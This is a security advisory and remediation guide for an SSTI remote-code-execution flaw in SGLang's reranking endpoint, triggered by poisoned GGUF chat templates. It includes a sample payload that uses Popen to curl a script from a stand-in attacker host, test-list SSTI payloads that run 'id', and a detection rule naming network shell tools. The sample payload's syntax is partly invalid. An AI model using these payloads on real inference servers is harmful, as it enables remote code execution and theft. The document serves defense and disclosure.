Executive Summary
CVE-2026-5760 is a critical (CVSS 9.8) Server-Side Template Injection (SSTI) vulnerability in SGLang, a widely used open-source inference framework for large language models and multimodal AI models. By embedding a malicious Jinja2 payload inside a GGUF model's tokenizer.chat_template field, an attacker can execute arbitrary Python — and therefore arbitrary OS commands — on the hosting inference server the moment that model is loaded and a request hits the /v1/rerank endpoint. The attack requires no authentication and can be delivered entirely through poisoned models published on platforms like Hugging Face, making this a first-class AI supply chain threat.
1. What Is This Vulnerability?
SGLang is a high-performance, open-source serving framework designed to efficiently serve large language models (LLMs) and multimodal models. It exposes an OpenAI-compatible API surface and supports GGUF — the "GPT-Generated Unified Format" model format popularized by llama.cpp — as a supported model format.
The vulnerability resides in serving_rerank.py, the component responsible for SGLang's reranking endpoint (/v1/rerank). When processing a chat template sourced from an incoming GGUF model, SGLang renders it using the standard, unsandboxed jinja2.Environment() function:
# VULNERABLE CODE (serving_rerank.py — SGLang ≤ 0.5.9)
from jinja2 import Environment
env = Environment()
template = env.from_string(model.chat_template)
rendered = template.render(messages=messages)
The Jinja2 Environment() class, by design, does not restrict access to Python builtins, object attributes, or class hierarchies. This is safe when the template source is trusted, but catastrophically dangerous when it originates from user-supplied content — such as the tokenizer.chat_template field embedded in an untrusted GGUF file.
The correct approach is ImmutableSandboxedEnvironment, which strips access to dangerous Python internals:
# SAFE CODE
from jinja2.sandbox import ImmutableSandboxedEnvironment
env = ImmutableSandboxedEnvironment()
template = env.from_string(model.chat_template)
rendered = template.render(messages=messages)
Attack Vector
An attacker crafts a GGUF model file where tokenizer.chat_template contains a Jinja2 SSTI payload. A trigger phrase — specifically the string "The answer can only be 'yes' or 'no'" — is woven into the template to activate SGLang's internal Qwen3 reranker detection logic, which is the code path that calls the vulnerable template renderer.
A simplified version of the payload looks like this:
{# Malicious tokenizer.chat_template #}
{% if 'The answer can only be \'yes\' or \'no\'' in messages[-1]['content'] %}
{{ ''.__class__.__mro__[1].__subclasses__()
| selectattr('__name__', 'equalto', 'Popen') | first
| (x -> x(['curl', 'https://attacker.com/shell.sh', '-o', '/tmp/s.sh'],
stdout=-1).communicate()) }}
{% endif %}
{{ messages | map(attribute='content') | join('\n') }}
When a victim loads this model and any request arrives at /v1/rerank, SGLang executes the template and the attacker's OS command runs with full inference server privileges.
Real-World Impact
While no confirmed in-the-wild exploitation campaign has been publicly attributed to this CVE as of April 2026, the attack surface is substantial:
- Thousands of GGUF models are hosted on public repositories such as Hugging Face, many downloaded tens of thousands of times per day.
- SGLang is used heavily in enterprise AI infrastructure, private AI clouds, and research clusters.
- A compromised inference server may expose GPU resources, API keys, training data, proprietary model weights, and internal network access.
- The CERT/CC has issued advisory VU#915947, highlighting the severity of the supply chain risk.
2. Who Is Affected?
| Factor | Details |
|---|---|
| Affected software | SGLang versions ≤ 0.5.9 |
| Vulnerable component | serving_rerank.py (/v1/rerank endpoint) |
| Trigger condition | Loading a GGUF model with a malicious tokenizer.chat_template AND sending a request containing the trigger phrase to /v1/rerank |
| Attack authentication | None required — unauthenticated if /v1/rerank is internet-exposed |
| Deployment contexts at risk | Self-hosted SGLang servers, Kubernetes-based inference clusters, cloud GPU instances, HuggingFace Inference Endpoints using SGLang backends |
| Model distribution risk | Any org downloading GGUF models from unverified Hugging Face repos, model zoos, or community mirrors |
You are at risk if:
- You run SGLang version 0.5.9 or earlier
- You load GGUF models from public repositories without inspecting their
tokenizer.chat_template - Your SGLang
/v1/rerankendpoint is accessible from the network (even internally)
3. How to Detect It (Testing)
Manual Testing Steps
Step 1 — Verify SGLang version:
pip show sglang | grep Version
# OR
python -c "import sglang; print(sglang.__version__)"
If the version is 0.5.9 or lower, the system is vulnerable.
Step 2 — Inspect GGUF model chat templates:
Use the gguf-dump utility (from the gguf Python package) to extract and review embedded templates:
pip install gguf
python -c "
import gguf
reader = gguf.GGUFReader('your_model.gguf')
for field in reader.fields.values():
if 'chat_template' in field.name:
print(field.name, bytes(field.parts[-1]).decode('utf-8'))
"
Look for any Jinja2 constructs involving __class__, __mro__, __subclasses__, subprocess, os.system, Popen, eval, exec, or __import__.
Step 3 — Test the vulnerable code path directly: On a sandboxed/isolated server, send a reranking request with the trigger phrase:
curl -X POST http://localhost:30000/v1/rerank \
-H "Content-Type: application/json" \
-d '{
"model": "your-loaded-model",
"query": "The answer can only be '\''yes'\'' or '\''no'\''",
"documents": ["test document one", "test document two"]
}'
Monitor server-side for unexpected subprocess creation or outbound network connections.
Automated Scanning
Tool: Snyk / Snyk CLI
snyk test --all-projects
# Look for: CVE-2026-5760 in sglang dependency tree
Tool: pip-audit
pip install pip-audit
pip-audit
# Expected output for vulnerable installs:
# sglang 0.5.9 CVE-2026-5760 GHSA-XXXX-XXXX
Tool: OSV-Scanner (Google)
osv-scanner --lockfile requirements.txt
# Or scan the full Python environment:
osv-scanner -r /path/to/project
Tool: Trivy (container/image scanning)
trivy image your-sglang-docker-image:tag
# Filter for: CVE-2026-5760
Code Review Checklist
- Search for
from jinja2 import Environmentin any file related to model serving or template rendering — unsafe pattern - Verify
ImmutableSandboxedEnvironmentorSandboxedEnvironmentis used everywhere Jinja2 renders model-supplied templates - Confirm
tokenizer.chat_templatevalues are validated or stripped of dangerous constructs before rendering - Check that no GGUF model loading path passes raw
chat_templatefields directly into a Jinja2 render call - Audit any
/v1/rerankor similar endpoint for input sanitization gaps
4. How to Fix It (Mitigation)
Step-by-Step Remediation
-
Upgrade SGLang immediately to a version that includes the sandboxed Jinja2 fix (monitor the SGLang GitHub releases for a patched release — as of disclosure, no official patch version was available, making workarounds critical).
-
Apply the Jinja2 sandbox fix manually if a patched SGLang release is unavailable. Locate
serving_rerank.pyin your SGLang installation:find $(python -c "import sglang; import os; print(os.path.dirname(sglang.__file__))") -name "serving_rerank.py" -
Replace the unsandboxed Environment:
# BEFORE (vulnerable) from jinja2 import Environment env = Environment() # AFTER (safe) from jinja2.sandbox import ImmutableSandboxedEnvironment env = ImmutableSandboxedEnvironment() -
Audit all other Jinja2 usages in the codebase for the same pattern — any
Environment()that renders external input is a candidate for the same class of vulnerability. -
Restart the SGLang service after applying the patch:
systemctl restart sglang # OR for containerized deployments: kubectl rollout restart deployment/sglang-server -
Rotate credentials and secrets exposed on any inference servers that loaded models from unverified sources, as a precaution against prior exploitation.
Code Fix Example
# serving_rerank.py — BEFORE (CVE-2026-5760 vulnerable)
from jinja2 import Environment
def apply_chat_template(tokenizer, messages):
env = Environment() # ← No sandboxing; arbitrary code execution possible
template = env.from_string(tokenizer.chat_template)
return template.render(messages=messages)
# serving_rerank.py — AFTER (patched)
from jinja2.sandbox import ImmutableSandboxedEnvironment
def apply_chat_template(tokenizer, messages):
env = ImmutableSandboxedEnvironment() # ← Sandboxed; Python builtins blocked
template = env.from_string(tokenizer.chat_template)
return template.render(messages=messages)
ImmutableSandboxedEnvironment prevents access to __class__, __mro__, __subclasses__, __builtins__, and all other escape vectors used by SSTI payloads. Any attempt to call these attributes raises a SecurityError and the render fails safely.
Configuration Hardening
Network-level controls (immediate risk reduction):
# Block external access to the reranking endpoint with iptables:
iptables -A INPUT -p tcp --dport 30000 -s 0.0.0.0/0 -j DROP
iptables -A INPUT -p tcp --dport 30000 -s 10.0.0.0/8 -j ACCEPT # Allow only internal
# OR restrict with nginx reverse proxy:
location /v1/rerank {
allow 10.0.0.0/8;
deny all;
proxy_pass http://localhost:30000;
}
SGLang server startup flags:
# Bind only to localhost to prevent external exposure:
python -m sglang.launch_server \
--model-path ./your_model.gguf \
--host 127.0.0.1 \
--port 30000
Container security (drop capabilities, read-only FS):
# In your Kubernetes pod spec:
securityContext:
runAsNonRoot: true
readOnlyRootFilesystem: true
allowPrivilegeEscalation: false
capabilities:
drop: ["ALL"]
5. How to Test the Fix (Validation)
Regression Test Scenarios
- Scenario A: Load a GGUF model with a benign
tokenizer.chat_templateand confirm/v1/rerankreturns correct rankings — no functionality regression. - Scenario B: Load a GGUF model with a crafted malicious Jinja2 SSTI payload in
tokenizer.chat_templateand send the trigger request. Confirm the server returns aSecurityErroror HTTP 500/400 without executing any subprocess. - Scenario C: Send standard reranking requests with the trigger phrase in the query but with a benign model loaded — confirm no unexpected behavior.
Security Test Cases
Test Case 1: SSTI payload is blocked by sandboxed environment
- Precondition: Apply Jinja2
ImmutableSandboxedEnvironmentfix - Steps: Load a model with
tokenizer.chat_template = "{{ ''.__class__.__mro__[1].__subclasses__() }}", send a POST to/v1/rerank - Expected Result: Server raises
jinja2.exceptions.SecurityError: access to attribute '__class__' of 'str' object is unsafe, no code executed
Test Case 2: Outbound connection from exploit payload does not succeed
- Precondition: Apply fix
- Steps: Load a model with a
curl-based SSTI exfiltration payload; monitor network withtcpdump -i any dst port 443 - Expected Result: No outbound connections to attacker-controlled hosts
Test Case 3: Normal reranking continues to work
- Precondition: Apply fix, legitimate model loaded
- Steps: POST
{"query": "cybersecurity", "documents": ["doc1", "doc2"]}to/v1/rerank - Expected Result: HTTP 200, valid ranking scores returned
Automated Tests
# test_cve_2026_5760.py — Security regression test
import pytest
from jinja2.sandbox import ImmutableSandboxedEnvironment
from jinja2 import SecurityError
MALICIOUS_TEMPLATES = [
"{{ ''.__class__.__mro__[1].__subclasses__() }}",
"{% for x in ().__class__.__base__.__subclasses__() %}{{ x.__name__ }}{% endfor %}",
"{{ self.__init__.__globals__['__builtins__']['__import__']('os').system('id') }}",
"{{ lipsum.__globals__['os'].popen('id').read() }}",
]
def test_ssti_payloads_blocked_by_sandbox():
env = ImmutableSandboxedEnvironment()
for payload in MALICIOUS_TEMPLATES:
with pytest.raises(SecurityError):
template = env.from_string(payload)
template.render()
def test_legitimate_template_renders_correctly():
env = ImmutableSandboxedEnvironment()
template = env.from_string(
"{% for msg in messages %}{{ msg.role }}: {{ msg.content }}\n{% endfor %}"
)
result = template.render(messages=[
{"role": "user", "content": "Is the sky blue?"},
{"role": "assistant", "content": "Yes."}
])
assert "user: Is the sky blue?" in result
assert "assistant: Yes." in result
Run the test suite:
pytest test_cve_2026_5760.py -v
6. Prevention & Hardening
Best Practices
AI Model Supply Chain Controls:
- Only load GGUF models from organizationally vetted, internal model registries. Mirror approved models internally rather than downloading directly from Hugging Face during production deployments.
- Implement a model vetting pipeline that extracts and statically analyzes
tokenizer.chat_templatefor dangerous Jinja2 constructs before any model is deployed. - Use cryptographic model signing and verify signatures before loading. Tools like
sigstorecan be adapted for model artifact signing. - Apply the "principle of least trust" to all external model assets — treat them like untrusted user input.
Jinja2 Hardening in AI Frameworks:
- Audit every place in your ML serving infrastructure where Jinja2 renders externally sourced templates. Use
ImmutableSandboxedEnvironmentuniversally for any template content that isn't 100% developer-controlled. - Add a
grep-based CI check to flag unsafe Jinja2Environment()usage:# In CI pipeline: grep -rn "jinja2.Environment()" ./src --include="*.py" && echo "FAIL: Unsandboxed Jinja2 found" && exit 1
Network Segmentation:
- Never expose SGLang's API port (default: 30000) directly to the internet or untrusted networks. Place it behind an authenticated API gateway or reverse proxy.
- Apply egress filtering on inference servers — they should not need to initiate outbound connections to arbitrary internet hosts.
Runtime Isolation:
- Run inference servers in minimal containers with read-only filesystems and dropped Linux capabilities. Even if RCE occurs, a contained environment dramatically limits blast radius.
- Use
seccompprofiles to restrict the system calls available to the inference process:securityContext: seccompProfile: type: RuntimeDefault
Monitoring & Detection
Indicators of Compromise (IoCs):
- Unexpected subprocess execution from the SGLang process (e.g.,
curl,wget,bash,sh) — monitor withauditdor eBPF-based tools like Falco - Outbound network connections from the inference server to unknown external IPs
- New files created in
/tmp,/dev/shm, or world-writable directories by the SGLang process - Unusual CPU/network spikes following GGUF model loads
Falco rule to detect suspicious subprocess spawning:
- rule: SGLang Spawns Shell
desc: Detects shell or curl execution spawned from an SGLang inference process
condition: >
spawned_process and
proc.pname in (sglang, python3, uvicorn) and
proc.name in (bash, sh, curl, wget, nc, ncat, python3)
output: "SGLang spawned suspicious process (proc=%proc.name parent=%proc.pname cmd=%proc.cmdline)"
priority: CRITICAL
Model load audit logging: Log the SHA-256 hash of every GGUF model loaded and cross-reference against your approved model registry:
import hashlib
def audit_model_load(model_path: str) -> str:
sha256 = hashlib.sha256()
with open(model_path, "rb") as f:
for chunk in iter(lambda: f.read(65536), b""):
sha256.update(chunk)
digest = sha256.hexdigest()
# Compare against allowlist
assert digest in APPROVED_MODEL_HASHES, f"Unapproved model hash: {digest}"
return digest
References
- CVE Entry: CVE-2026-5760 — NVD
- CERT/CC Advisory: VU#915947 — SGLang RCE via Chat Templates
- Original Disclosure: The Hacker News — SGLang CVE-2026-5760
- Technical Deep Dive: Vulert Blog — SGLang CVE-2026-5760 RCE
- GBHackers Analysis: Malicious GGUF Models Could Trigger RCE on SGLang Servers
- CyberSecurityNews Coverage: Hackers Weaponize GGUF Models
- PT Security Database: CVE-2026-5760 Code Injection in SGLang
- Jinja2 Sandboxing Docs: Jinja2 Sandbox Environment — Pallets
- SGLang GitHub: github.com/sgl-project/sglang
- GGUF Format Spec: GGUF Documentation — ggerganov/ggml